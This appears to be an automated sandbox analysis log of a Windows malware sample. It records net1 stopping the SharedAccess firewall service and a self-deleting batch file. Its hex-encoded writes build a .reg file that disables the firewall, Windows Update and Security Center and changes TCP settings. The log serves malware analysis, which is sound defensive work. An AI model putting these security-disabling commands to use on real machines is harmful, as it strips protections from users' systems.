Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1588501312
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1588505349
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1588511316
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1588513244
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 8C0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1588539910
Process created	PID: 1756 Path: C:\WINDOWS\system32\net1.exe Cmdline: net1 stop SharedAccess Createflags: suspended	success or wait	1588543076

Analysis File: net1.exe PID: 1756 Parent PID: 536

Sections

General
Start time:	07:41:11
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net1.exe
Commandline:	net1 stop SharedAccess
Imagebase:	0x1000000
File size:	124928 bytes
MD5 hash:	3F14C041342E3FBA343F2A1D11E74BBA

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
C:\WINDOWS\system32\samlib.dll	query and write and read and execute	image	71BF0000	77824	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\ntdsapi.dll	query and write and read and execute	image	767A0000	77824	own pid	read write	success or wait	1
C:\WINDOWS\system32\dnsapi.dll	query and write and read and execute	image	76F20000	159744	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
\KnownDlls\WLDAP32.dll	write and read and execute	image	76F60000	180224	own pid	read write	success or wait	1
C:\WINDOWS\system32\netrap.dll	query and write and read and execute	image	71C80000	28672	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1030000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
C:\WINDOWS\system32\netmsg.dll	query and write and read and execute	image	71B40000	180224	own pid	read write	success or wait	1	10132A7

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1588899902
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1588923723
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1588932753
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1588933637
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1588934073
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1588943932
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1588959245
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1588989886
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1588993243
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1589004178
Section loaded	Path: C:\WINDOWS\system32\samlib.dll Access: query and write and read and execute Type: image Baseaddress: 71BF0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1589020230
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1589023556
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1589024677
Section loaded	Path: C:\WINDOWS\system32\ntdsapi.dll Access: query and write and read and execute Type: image Baseaddress: 767A0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1589032102
Section loaded	Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid	success or wait	1589034374
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	1589044314
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1589062646
Section loaded	Path: \KnownDlls\WLDAP32.dll Access: write and read and execute Type: image Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1589072716
Section loaded	Path: C:\WINDOWS\system32\netrap.dll Access: query and write and read and execute Type: image Baseaddress: 71C80000 Size: 28672 Protection: read write Mapped to pid: own pid	success or wait	1589089011
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1589211568
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1589224846
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1589246717
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1589248733
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1589252607
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1589268484
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1589279068
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1589299369
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1589312303
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1589324647
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1589329320
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1589353759
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1589379860
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1589400078
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1589416902
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1589472658
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1589482040
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1589488404
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1030000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1589853149
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1589898372
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1589908832
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1589937117
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1590017551
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1590019148
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1590123349
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1590153720
Section loaded	Path: C:\WINDOWS\system32\netmsg.dll Access: query and write and read and execute Type: image Baseaddress: 71B40000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1590626547

Analysis File: cmd.exe PID: 1188 Parent PID: 808

Sections

General
Start time:	07:41:11
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\cmd.exe
Commandline:	cmd /c c:\sdfeww.bat
Imagebase:	0x4ad00000
File size:	389120 bytes
MD5 hash:	6D778E0F95447E6546553EEEA709D03C

File Activities:

File opened
File Path	Access	Options	Content overwritten	Completion	Count	Source Address
c:\	read data or list directory and synchronize	directory file and synchronous io non alert and open for backup ident		success or wait	3	4AD02FBF
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	read attributes and synchronize and generic read and generic write	synchronous io non alert and non directory file	false	success or wait	22	4AD0E292
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	read attributes and delete	non directory file and open for backup ident and open reparse point		success or wait	1	4AD17D07
c:\sdfeww.bat	read attributes and delete	non directory file and open for backup ident and open reparse point		success or wait	1	4AD17D07
c:\sdfeww.bat	read attributes and synchronize and generic read	synchronous io non alert and non directory file	false	wait	1	4AD02F12

File created
File Path	Access	Attributes	Options	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	read attributes and synchronize and generic write	normal	synchronous io non alert and non directory file	success or wait	1	4AD02F12

File deleted
File Path	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1	4AD17D07
C:\sdfeww.bat	success or wait	1	4AD17D07

File written
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	10	52 45 47 45 44 49 54 34 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	2	0D 0A	success or wait	7	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	70	20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	24	22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 32 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	112	20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61 72 61 6D 65 74 65 72 73 5C 46 69 72 65 77 61 6C 6C 50 6F 6C 69 63 79 5C 53 74 61 6E 64 61	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	33	22 45 6E 61 62 6C 65 46 69 72 65 77 61 6C 6C 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	66	20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	24	22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 0D 0A	success or wait	2	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	60	20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	73	20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C 5D 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	25	22 57 32 4B 4C 70 6B 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	74	20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 54 63 70 69 70 5C 50 61 72 61 6D 65 74 65 72 73 5D 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	30	22 4D 61 78 46 72 65 65 54 63 62 73 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 37 64 30 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	35	22 4D 61 78 48 61 73 68 54 61 62 6C 65 53 69 7A 65 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 38 30 30 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	36	22 54 63 70 54 69 6D 65 64 57 61 69 74 44 65 6C 61 79 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 31 65 0D 0A	success or wait	1	4AD0652F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	30	22 4D 61 78 55 73 65 72 50 6F 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 66 36 31 38 0D 0A	success or wait	1	4AD0652F
1188	none	33	54 68 65 20 62 61 74 63 68 20 66 69 6C 65 20 63 61 6E 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E 0D 0A	invalid handle	1	4AD0652F

File read
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\sdfeww.bat	none	8192	40 65 63 68 6F 20 6F 66 66 0D 0A 45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 3E 3E	success or wait	1	4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	none	1	0A	success or wait	22	4AD0E081
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 32 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5C 50 61 72 61 6D 65 74 65 72 73 5C 46 69 72 65 77 61 6C 6C 50 6F 6C 69 63 79 5C 53	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 45 6E 61 62 6C 65 46 69 72 65 77 61 6C 6C 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 30 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 3E 3E 25 74 65 6D	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 77 75 61 75 73 65 72 76 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53 74 61 72 74	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 6F 6E 74 72 6F 6C 53 65 74 30 30 31 5C 53 65 72 76 69 63 65 73 5C 77 73 63 73 76 63 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30 30 30 30 34 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C	success or wait	1	4AD069F8
C:\sdfeww.bat	none	8192	45 63 68 6F 20 20 5B 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 49 6E 74 65 72 6E 61 74 69 6F 6E 61 6C 5D 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F	success or wait	1	4AD069F8
